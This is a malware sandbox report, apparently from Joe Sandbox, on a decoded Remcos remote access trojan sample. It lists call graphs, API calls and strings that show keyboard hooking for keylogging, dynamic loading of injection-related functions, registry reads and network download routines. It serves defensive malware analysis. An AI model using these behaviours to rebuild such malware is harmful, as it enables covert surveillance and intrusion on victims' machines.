48021 401eea 26 API calls 48020->48021 48022 414eb4 48021->48022 48023 401eea 26 API calls 48022->48023 48024 414ec0 48023->48024 48025 401e13 26 API calls 48024->48025 48026 414ecc 48025->48026 48027 401eea 26 API calls 48026->48027 48028 414ed5 48027->48028 48029 401eea 26 API calls 48028->48029 48030 414ede 48029->48030 48031 401d64 28 API calls 48030->48031 48032 414ee9 48031->48032 48033 43a7f7 _strftime 42 API calls 48032->48033 48034 414ef6 48033->48034 48035 414f21 48034->48035 48036 414efb 48034->48036 48037 401d64 28 API calls 48035->48037 48039 414f14 48036->48039 48040 414f09 48036->48040 48037->48038 48038->47976 48054 404ab1 83 API calls 48038->48054 48042 404915 104 API calls 48039->48042 48053 4049ba 81 API calls 48040->48053 48042->47987 48043->47989 48045 41b0e0 48044->48045 48046 401f86 28 API calls 48045->48046 48047 414e0d 48046->48047 48047->47997 48048->48000 48049->48002 48050->48006 48051->48010 48052->48012 48053->47987 48054->47987 48056->47281 48057->47308 48058->47307 48059->47296 48060->47300 48061->47306 48064 40e642 48062->48064 48063 41258f 3 API calls 48063->48064 48064->48063 48066 40e6e6 48064->48066 48068 40e6d6 Sleep 48064->48068 48085 40e674 48064->48085 48065 4082dc 28 API calls 48065->48085 48067 4082dc 28 API calls 48066->48067 48070 40e6f1 48067->48070 48068->48064 48069 41b013 28 API calls 48069->48085 48072 41b013 28 API calls 48070->48072 48073 40e6fd 48072->48073 48097 41284c 29 API calls 48073->48097 48076 401e13 26 API calls 48076->48085 48077 40e710 48078 401e13 26 API calls 48077->48078 48080 40e71c 48078->48080 48079 401f66 28 API calls 48079->48085 48081 401f66 28 API calls 48080->48081 48082 40e72d 48081->48082 48084 4127aa 29 API calls 48082->48084 48083 4127aa 29 API calls 48083->48085 48086 40e740 48084->48086 48085->48065 48085->48068 48085->48069 48085->48076 48085->48079 48085->48083 48095 40bf04 73 API calls ___scrt_fastfail 48085->48095 48096 41284c 29 API calls 48085->48096 48098 411771 TerminateProcess WaitForSingleObject 48086->48098 48088 40e748 ExitProcess 48099 41170f 61 API calls 48089->48099 48096->48085 48097->48077 48098->48088 48100 43aba8 48102 43abb4 _swprintf ___BuildCatchObject 48100->48102 48101 43abc2 48118 445564 20 API calls _abort 48101->48118 48102->48101 48105 43abec 48102->48105 48104 43abc7 48119 43aa37 26 API calls _Deallocate 48104->48119 48113 444cdc EnterCriticalSection 48105->48113 48108 43abf7 48114 43ac98 48108->48114 48111 43abd2 __wsopen_s 48113->48108 48115 43aca6 48114->48115 48115->48115 48117 43ac02 48115->48117 48121 448626 39 API calls 2 library calls 48115->48121 48120 43ac1f LeaveCriticalSection std::_Lockit::~_Lockit 48117->48120 48118->48104 48119->48111 48120->48111 48121->48115 48122 414f4c 48137 41a726 48122->48137 48124 414f55 48125 401fbd 28 API calls 48124->48125 48126 414f64 48125->48126 48147 404468 60 API calls ctype 48126->48147 48128 414f70 48129 401eea 26 API calls 48128->48129 48130 414f79 48129->48130 48131 401d8c 26 API calls 48130->48131 48132 4163d6 48131->48132 48133 401eea 26 API calls 48132->48133 48134 4163e2 48133->48134 48135 401eea 26 API calls 48134->48135 48136 4163ee 48135->48136 48138 41a734 48137->48138 48139 43aa9c ___crtLCMapStringA 21 API calls 48138->48139 48140 41a73e InternetOpenW InternetOpenUrlW 48139->48140 48141 41a767 InternetReadFile 48140->48141 48145 41a78a 48141->48145 48142 401f86 28 API calls 48142->48145 48143 41a7b7 InternetCloseHandle InternetCloseHandle 48144 41a7c9 48143->48144 48144->48124 48145->48141 48145->48142 48145->48143 48146 401eea 26 API calls 48145->48146 48146->48145 48147->48128 48148 42629c 48153 426319 send 48148->48153

                                                          Executed Functions

                                                          Function 0041BEEE Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF03
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF0C
                                                          • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF23
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF26
                                                          • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF38
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF3B
                                                          • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF4C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF4F
                                                          • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D856), ref: 0041BF60
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF63
                                                          • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D856), ref: 0041BF70
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF73
                                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D856), ref: 0041BF80
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF83
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D856), ref: 0041BF90
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BF93
                                                          • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D856), ref: 0041BFA4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFA7
                                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D856), ref: 0041BFB4
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFB7
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D856), ref: 0041BFC8
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFCB
                                                          • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D856), ref: 0041BFDC
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFDF
                                                          • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D856), ref: 0041BFF0
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041BFF3
                                                          • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D856), ref: 0041C000
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C003
                                                          • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D856), ref: 0041C011
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C014
                                                          • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D856), ref: 0041C021
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C024
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D856), ref: 0041C036
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C039
                                                          • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D856), ref: 0041C046
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C049
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D856), ref: 0041C05B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C05E
                                                          • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D856), ref: 0041C06B
                                                          • GetProcAddress.KERNEL32(00000000), ref: 0041C06E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleLibraryLoadModule
                                                          • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                          • API String ID: 384173800-625181639
                                                          • Opcode ID: b0b2e61fc073e98d70dce9ef4f7eaaaad63808f39ef958059982ad015adeb2a9
                                                          • Instruction ID: 91c85bc0cfa8e625a7056272f5779649be84715ca0db9f9d819234a6a75bf275
                                                          • Opcode Fuzzy Hash: b0b2e61fc073e98d70dce9ef4f7eaaaad63808f39ef958059982ad015adeb2a9
                                                          • Instruction Fuzzy Hash: 4C31E2A0E8035C7ADB207BB69CC9F3B7E6DD9847953510427B54893190EB7DEC408EAE
                                                          Function 0040D83A Relevance: 60.3, APIs: 13, Strings: 21, Instructions: 800COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 5 40d83a-40d8bc call 41beee GetModuleFileNameW call 40e240 call 401fbd * 2 call 41b1ce call 40e995 call 401d8c call 43ea30 22 40d908-40d9d0 call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d8be-40d903 call 40ea5e call 401d64 call 401e8f call 40fd92 call 40ea0f call 40e22d 5->23 69 40d9d2-40da1d call 4085b4 call 401eef call 401eea call 401e8f call 41258f 22->69 70 40da23-40da3e call 401d64 call 40b125 22->70 49 40dd69-40dd7a call 401eea 23->49 69->70 102 40e20c-40e22c call 401e8f call 4129da call 41138d 69->102 80 40da40-40da5f call 401e8f call 41258f 70->80 81 40da78-40da7f call 40bed7 70->81 80->81 97 40da61-40da77 call 401e8f call 4129da 80->97 90 40da81-40da83 81->90 91 40da88-40da8f 81->91 94 40dd68 90->94 95 40da91 91->95 96 40da93-40da9f call 41a66e 91->96 94->49 95->96 103 40daa1-40daa3 96->103 104 40daa8-40daac 96->104 97->81 103->104 107 40daeb-40dafe call 401d64 call 401e8f 104->107 108 40daae call 40697b 104->108 127 40db00 call 4069ba 107->127 128 40db05-40db8d call 401d64 call 41b013 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 117 40dab3-40dab5 108->117 120 40dac1-40dad4 call 401d64 call 401e8f 117->120 121 40dab7-40dabc call 40699d call 4064d0 117->121 120->107 137 40dad6-40dadc 120->137 121->120 127->128 163 40dbf5-40dbf9 128->163 164 40db8f-40dba8 call 401d64 call 401e8f call 43a821 128->164 137->107 140 40dade-40dae4 137->140 140->107 142 40dae6 call 4064d0 140->142 142->107 166 40dd7d-40ddd4 call 436260 call 4022f8 call 401e8f * 2 call 412735 call 4082d7 163->166 167 40dbff-40dc06 163->167 164->163 191 40dbaa-40dbf0 call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->191 222 40ddd9-40de2f call 401d64 call 401e8f call 401f66 call 401e8f call 4127aa call 401d64 call 401e8f call 43a7f7 166->222 170 40dc84-40dc8e call 4082d7 167->170 171 40dc08-40dc82 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->171 177 40dc93-40dcb7 call 4022f8 call 433ad3 170->177 171->177 198 40dcc6 177->198 199 40dcb9-40dcc4 call 436260 177->199 191->163 204 40dcc8-40dd13 call 401e07 call 43e559 call 4022f8 call 401e8f call 4022f8 call 401e8f call 41297a 198->204 199->204 259 40dd18-40dd3d call 433adc call 401d64 call 40b125 204->259 273 40de31 222->273 274 40de4c-40de4e 222->274 259->222 272 40dd43-40dd64 call 401d64 call 41b013 call 40e2f1 259->272 272->222 292 40dd66 272->292 278 40de33-40de4a call 41c0bb CreateThread 273->278 275 40de50-40de52 274->275 276 40de54 274->276 275->278 280 40de5a-40df39 call 401f66 * 2 call 41a891 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a7f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 276->280 278->280 330 40df74 280->330 331 40df3b-40df72 call 433818 call 401d64 call 401e8f CreateThread 280->331 292->94 333 40df76-40df8e call 401d64 call 401e8f 330->333 331->333 343 40df90-40dfc7 call 433818 call 401d64 call 401e8f CreateThread 333->343 344 40dfcc-40dfdf call 401d64 call 401e8f 333->344 343->344 354 40dfe1-40e03a call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 344->354 355 40e03f-40e052 call 401d64 call 401e8f 344->355 354->355 365 40e054-40e088 call 401d64 call 401e8f call 401d64 call 401e8f call 43a7f7 call 40b95c 355->365 366 40e08d-40e0b1 call 41a9ad call 401e18 call 401e13 355->366 365->366 386 40e0b3-40e0b4 SetProcessDEPPolicy 366->386 387 40e0b6-40e0c9 CreateThread 366->387 386->387 390 40e0d7-40e0de 387->390 391 40e0cb-40e0d5 CreateThread 387->391 394 40e0e0-40e0ea CreateThread 390->394 395 40e0ec-40e0f3 390->395 391->390 394->395 398 40e0f5-40e0f8 395->398 399 40e106-40e10b 395->399 401 40e146-40e161 call 401e8f call 412546 398->401 402 40e0fa-40e104 398->402 404 40e110-40e141 call 401f66 call 404c9e call 401f66 call 41a891 call 401eea 399->404 413 40e167-40e1a7 call 41b013 call 401e07 call 41265c call 401e13 call 401e07 401->413 414 40e1fd-40e207 call 40cbac call 40cc37 call 4140ac 401->414 402->404 404->401 435 40e1c0-40e1c5 DeleteFileW 413->435 414->102 436 40e1c7-40e1f8 call 41b013 call 401e07 call 412a52 call 401e13 * 2 435->436 437 40e1a9-40e1ac 435->437 436->414 437->436 438 40e1ae-40e1bb Sleep call 401e07 437->438 438->435
                                                          APIs
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF03
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF0C
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D856), ref: 0041BF23
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF26
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF38
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF3B
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D856), ref: 0041BF4C
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF4F
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D856), ref: 0041BF60
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF63
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D856), ref: 0041BF70
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF73
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D856), ref: 0041BF80
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF83
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D856), ref: 0041BF90
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BF93
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D856), ref: 0041BFA4
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFA7
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D856), ref: 0041BFB4
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFB7
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D856), ref: 0041BFC8
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFCB
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D856), ref: 0041BFDC
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFDF
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D856), ref: 0041BFF0
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041BFF3
                                                            • Part of subcall function 0041BEEE: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D856), ref: 0041C000
                                                            • Part of subcall function 0041BEEE: GetProcAddress.KERNEL32(00000000), ref: 0041C003
                                                            • Part of subcall function 0041BEEE: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D856), ref: 0041C011
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe,00000104), ref: 0040D863
                                                            • Part of subcall function 0040FD92: __EH_prolog.LIBCMT ref: 0040FD97
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                          • String ID: SG$0TG$Access Level: $Administrator$C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$Exe$Exe$Inj$PSG$PSG$Remcos Agent initialized$Rmc-JLQBNY$Software\$User$dMG$del$del$exepath$hSG$licence$license_code.txt
                                                          • API String ID: 2830904901-3689915391
                                                          • Opcode ID: 725633127e4b77860ee352cd58d9fd0f2a9b5a5623a9bf6990050f69c27e9e3b
                                                          • Instruction ID: b96e9d53b64ce9762df997b7c443b274fb73bccd3fe431706256fac2145036cf
                                                          • Opcode Fuzzy Hash: 725633127e4b77860ee352cd58d9fd0f2a9b5a5623a9bf6990050f69c27e9e3b
                                                          • Instruction Fuzzy Hash: 2E32C760B043406ADA14B776DC57BBE259A9F81748F00483FB9467B2E2DEBC9D44C39E
                                                          Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1289 4099e4-4099fd 1290 409a63-409a73 GetMessageA 1289->1290 1291 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1289->1291 1292 409a75-409a8d TranslateMessage DispatchMessageA 1290->1292 1293 409a8f 1290->1293 1291->1290 1294 409a1b-409a61 GetLastError call 41af51 call 404c9e call 401f66 call 41a891 call 401eea 1291->1294 1292->1290 1292->1293 1295 409a91-409a96 1293->1295 1294->1295
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                          • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                          • GetLastError.KERNEL32 ref: 00409A1B
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                          • TranslateMessage.USER32(?), ref: 00409A7A
                                                          • DispatchMessageA.USER32(?), ref: 00409A85
                                                          Strings
                                                          • Keylogger initialization failure: error , xrefs: 00409A32
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                          • String ID: Keylogger initialization failure: error
                                                          • API String ID: 3219506041-952744263
                                                          • Opcode ID: c6ad27a1f32c7b35bd706965db4ad972d695f79b56ef0d389dbfdbb6ef8f6fa1
                                                          • Instruction ID: 916e88852ed13b3ab14e3660f0b3d121b0d8821096f38c6baae7fa71b0b7a026
                                                          • Opcode Fuzzy Hash: c6ad27a1f32c7b35bd706965db4ad972d695f79b56ef0d389dbfdbb6ef8f6fa1
                                                          • Instruction Fuzzy Hash: 6D118271604301AFC710BB7A9C4996B77ECAB94B15B10057EFC45E2191EE34DA01CBAA
                                                          Function 0040E627 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 0041258F: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                            • Part of subcall function 0041258F: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                            • Part of subcall function 0041258F: RegCloseKey.KERNEL32(?), ref: 004125D8
                                                          • Sleep.KERNEL32(00000BB8), ref: 0040E6DB
                                                          • ExitProcess.KERNEL32 ref: 0040E74A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseExitOpenProcessQuerySleepValue
                                                          • String ID: 6.0.0 Pro$override$pth_unenc
                                                          • API String ID: 2281282204-4012039065
                                                          • Opcode ID: e48c5bd0e5f8f7b978d8bdbd670fe216713c81f394539d974a824bf7a4ef8053
                                                          • Instruction ID: 41eca1b412dc6cb4cbd69e66e1420b1d2a9bda06de9f36a729d5cd10817e4b5d
                                                          • Opcode Fuzzy Hash: e48c5bd0e5f8f7b978d8bdbd670fe216713c81f394539d974a824bf7a4ef8053
                                                          • Instruction Fuzzy Hash: A821D131F1420027D60876778857B6F399A9B81719F90052EF819A72E7EEBD9E1083DF
                                                          Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1449 404915-404924 1450 4049b1 1449->1450 1451 40492a-404931 1449->1451 1452 4049b3-4049b7 1450->1452 1453 404933-404937 1451->1453 1454 404939-404940 1451->1454 1455 404987-4049af CreateEventA CreateThread 1453->1455 1454->1455 1456 404942-404982 GetLocalTime call 41af51 call 404c9e call 401f66 call 41a891 call 401eea 1454->1456 1455->1452 1456->1455
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,004755B0,00000000,?,?,?,?,?,00414F1C,?,00000001), ref: 00404946
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,004755B0,00000000,?,?,?,?,?,00414F1C,?,00000001), ref: 00404994
                                                          • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 3706b51fedfb6b17057c05fa2c189eb69b55955f33b2a26d59dd23dd1e9d912a
                                                          • Instruction ID: 334fa9fd2124ebc6c4f40b6d461b17bc354faf393a4ed588a06a33f3771f6744
                                                          • Opcode Fuzzy Hash: 3706b51fedfb6b17057c05fa2c189eb69b55955f33b2a26d59dd23dd1e9d912a
                                                          • Instruction Fuzzy Hash: 1611E3B19052547ACB10A7BA8849BDB7F9CAB86364F00007FF50462292DA789845CBFA
                                                          Function 00432B45 Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004328CD,00000024,?,?,?), ref: 00432B57
                                                          • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CDC9,?), ref: 00432B6D
                                                          • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CDC9,?), ref: 00432B7F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
